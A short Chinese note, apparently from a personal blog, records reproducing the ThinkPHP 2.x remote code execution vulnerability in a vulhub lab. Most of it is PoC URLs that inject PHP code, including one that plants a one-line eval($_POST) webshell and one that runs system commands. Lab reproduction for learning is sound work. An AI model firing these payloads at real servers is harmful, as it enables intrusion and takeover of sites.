vulhub靶场复现Thinkphp 2.0rce漏洞(打算趁着最近有时间,把一些中间件的漏洞都尝试复现一下,并且记录好)
poc:ip:port/inedx.php?s=a/b/c/${phpcode}
例如①ip:8080/index.php?s=a/b/c${phpinfo()}----phpinfo
②ip:8080/index.php?s=a/b/c${print(eval($_POST[a]))}----一句话木马
附带一张图ip:8080/index.php?s=a/b/c${print(eval(system(pwd)))}
仅记录学习,复现过程
漏洞产生原理参考博客:漏洞复现-2.x rce-Thinkphp远程命令执行 - 铺哩 - 博客园 (cnblogs.com)